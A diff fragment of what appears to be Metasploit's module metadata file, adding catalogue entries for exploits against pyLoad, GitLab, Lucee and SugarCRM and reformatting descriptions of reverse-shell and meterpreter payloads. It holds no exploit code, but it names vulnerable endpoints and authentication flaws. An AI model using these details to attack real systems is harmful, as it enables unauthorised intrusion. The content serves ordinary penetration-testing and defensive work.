+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-13",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "bAu"
+    ],
+    "description": "pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport\n          functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request\n          to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,\n          the primary of which is on port 8000 and can not be used by external hosts. A secondary \"Click 'N' Load\"\n          service runs on port 9666 and can be used remotely without authentication.",
+    "references": [
+      "CVE-2023-0297",
+      "URL-https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/",
+      "URL-https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad",
+      "URL-https://github.com/pyload/pyload/commit/7d73ba7919e594d783b3411d7ddb87885aea782d"
+    ],
+    "platform": "Linux,Python,Unix",
+    "arch": "cmd, x86, x64, python",
+    "rport": 9666,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Python"
+    ],
+    "mod_time": "2023-02-15 16:29:42 +0000",
+    "path": "/modules/exploits/linux/http/pyload_js2py_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pyload_js2py_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/qnap_qcenter_change_passwd_exec": {
    "name": "QNAP Q'Center change_passwd Command Execution",
    "fullname": "exploit/linux/http/qnap_qcenter_change_passwd_exec",
@@ -79294,7 +79664,7 @@
      "Linux SPARC64",
      "Linux s390x"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-03-05 14:30:47 +0000",
    "path": "/modules/exploits/linux/samba/is_known_pipename.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/is_known_pipename",
@@ -86771,12 +87141,14 @@
    "disclosure_date": "2023-02-01",
    "type": "exploit",
    "author": [
-      "Ron Bowes"
+      "Ron Bowes",
+      "Frycos (Florian Hauser)"
    ],
    "description": "This module exploits CVE-2023-0669, which is an object deserialization\n          vulnerability in Fortra GoAnywhere MFT.",
    "references": [
      "CVE-2023-0669",
-      "URL-https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis"
+      "URL-https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis",
+      "URL-https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html"
    ],
    "platform": "Unix,Windows",
    "arch": "cmd",
@@ -86800,7 +87172,7 @@
      "Version 2 Encryption",
      "Version 1 Encryption"
    ],
-    "mod_time": "2023-02-08 10:24:27 +0000",
+    "mod_time": "2023-02-09 23:06:59 +0000",
    "path": "/modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb",
    "is_install_path": true,
    "ref_name": "multi/http/fortra_goanywhere_rce_cve_2023_0669",
@@ -87446,6 +87818,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gitlab_github_import_rce_cve_2022_2992": {
+    "name": "GitLab GitHub Repo Import Deserialization RCE",
+    "fullname": "exploit/multi/http/gitlab_github_import_rce_cve_2022_2992",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-06",
+    "type": "exploit",
+    "author": [
+      "William Bowling (vakzz)",
+      "Heyder Andrade <https://infosec.exchange/@heyder>",
+      "RedWay Security <https://infosec.exchange/@redway>"
+    ],
+    "description": "An authenticated user can import a repository from GitHub into GitLab.\n          If a user attempts to import a repo from an attacker-controlled server,\n          the server will reply with a Redis serialization protocol object in the nested\n          `default_branch`. GitLab will cache this object and\n          then deserialize it when trying to load a user session, resulting in RCE.",
+    "references": [
+      "URL-https://hackerone.com/reports/1679624",
+      "URL-https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992",
+      "URL-https://gitlab.com/gitlab-org/gitlab/-/issues/371884",
+      "CVE-2022-2992"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-02-14 15:26:01 +0000",
+    "path": "/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gitlab_github_import_rce_cve_2022_2992",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gitlab_shell_exec": {
    "name": "Gitlab-shell Code Execution",
    "fullname": "exploit/multi/http/gitlab_shell_exec",
@@ -89344,6 +89779,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/lucee_scheduled_job": {
+    "name": "Lucee Authenticated Scheduled Job Code Execution",
+    "fullname": "exploit/multi/http/lucee_scheduled_job",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-02-10",
+    "type": "exploit",
+    "author": [
+      "Alexander Philiotis"
+    ],
+    "description": "This module can be used to execute a payload on Lucee servers that have an exposed\n          administrative web interface. It's possible for an administrator to create a\n          scheduled job that queries a remote ColdFusion file, which is then downloaded and executed\n          when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,\n          the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;\n          on Linux, it is either the root user or lucee.",
+    "references": [
+      "URL-https://docs.lucee.org/",
+      "URL-https://docs.lucee.org/reference/tags/execute.html",
+      "URL-https://docs.lucee.org/reference/tags/script.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8888,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Command",
+      "Unix Command"
+    ],
+    "mod_time": "2023-02-28 17:28:48 +0000",
+    "path": "/modules/exploits/multi/http/lucee_scheduled_job.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/lucee_scheduled_job",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/magento_unserialize": {
    "name": "Magento 2.0.6 Unserialize Remote Code Execution",
    "fullname": "exploit/multi/http/magento_unserialize",
@@ -95783,6 +96280,73 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/sugarcrm_webshell_cve_2023_22952": {
+    "name": "SugarCRM unauthenticated Remote Code Execution (RCE)",
+    "fullname": "exploit/multi/http/sugarcrm_webshell_cve_2023_22952",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-12-28",
+    "type": "exploit",
+    "author": [
+      "Sw33t.0day",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n          Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n          Serve versions prior to 12.0.2.\n\n          The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n          embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n          /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n          the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n          gaining access to the system.\n\n          This vulnerability does not require authentication because there is a missing authentication check in the\n          loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n          destroyed and hence the attacker can continue to send valid requests to the application.\n\n          Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n          access to the underlying operating system as the user that the web services are running as (typically www-data).",
+    "references": [
+      "CVE-2023-22952",
+      "URL-https://seclists.org/fulldisclosure/2022/Dec/31",
+      "URL-https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/",
+      "URL-https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update",
+      "URL-https://attackerkb.com/topics/E486ui94II/cve-2023-22952",
+      "PACKETSTORM-170346"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "cmd, php, x64, x86",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-03-07 18:15:07 +0000",
+    "path": "/modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/sugarcrm_webshell_cve_2023_22952",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/sun_jsws_dav_options": {
    "name": "Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",
    "fullname": "exploit/multi/http/sun_jsws_dav_options",
@@ -106578,7 +107142,8 @@
    "description": "pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to\n          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected\n          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.",
    "references": [
      "CVE-2022-31814",
-      "URL-https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/"
+      "URL-https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/",
+      "EDB-51032"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -106602,7 +107167,7 @@
      "Unix Command",
      "BSD Dropper"
    ],
-    "mod_time": "2022-10-24 14:17:21 +0000",
+    "mod_time": "2023-03-06 14:32:01 +0000",
    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
@@ -172591,7 +173156,7 @@
      "OJ Reeves",
      "anwarelmakrahy"
    ],
-    "description": "Run a meterpreter server in Android. Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -172628,7 +173193,7 @@
      "OJ Reeves",
      "anwarelmakrahy"
    ],
-    "description": "Run a meterpreter server in Android. Tunnel communication over HTTPS",
+    "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -172664,7 +173229,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Android. Connect back stager",
+    "description": "Run a meterpreter server in Android.\n\nConnect back stager",
    "references": [

    ],
@@ -172803,7 +173368,7 @@
      "anwarelmakrahy",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (sh). Tunnel communication over HTTP",
+    "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -172840,7 +173405,7 @@
      "anwarelmakrahy",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (sh). Tunnel communication over HTTPS",
+    "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -172875,7 +173440,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (sh). Connect back stager",
+    "description": "Spawn a piped command shell (sh).\n\nConnect back stager",
    "references": [

    ],
@@ -173607,7 +174172,7 @@
      "vlad902 <vlad902@gmail.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection over IPv6",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6",
    "references": [

    ],
@@ -173641,7 +174206,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -173675,7 +174240,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -173711,7 +174276,7 @@
      "vlad902 <vlad902@gmail.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -173745,7 +174310,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -173987,7 +174552,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -174021,7 +174586,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -175020,7 +175585,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -175055,7 +175620,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -175089,7 +175654,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -175123,7 +175688,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -175157,7 +175722,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -175193,7 +175758,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -175228,7 +175793,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -175262,7 +175827,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175296,7 +175861,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175330,7 +175895,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175364,7 +175929,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175399,7 +175964,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -175434,7 +175999,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -175469,7 +176034,7 @@
      "Spencer McIntyre",
      "mumbai"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -175504,7 +176069,7 @@
      "Spencer McIntyre",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -175539,7 +176104,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -175574,7 +176139,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -176895,7 +177460,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -176934,7 +177499,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -176972,7 +177537,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -177011,7 +177576,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -177047,7 +177612,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -177083,7 +177648,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -177121,7 +177686,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -177161,7 +177726,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection",
    "references": [

    ],
@@ -177198,7 +177763,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -177234,7 +177799,7 @@
      "bwatters-r7",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection",
    "references": [

    ],
@@ -177272,7 +177837,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [

    ],
@@ -177308,7 +177873,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [

    ],
@@ -177344,7 +177909,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -177380,7 +177945,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [

    ],
@@ -177418,7 +177983,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [

    ],
@@ -177456,7 +178021,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -177492,7 +178057,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -177528,7 +178093,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -177564,7 +178129,7 @@
      "bwatters-r7",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -177602,7 +178167,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -177640,7 +178205,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -177679,7 +178244,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -177719,7 +178284,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -177759,7 +178324,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -177796,7 +178361,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -177832,7 +178397,7 @@
      "bwatters-r7",
      "RageLtMan <rageltman@sempervictus>"
    ],
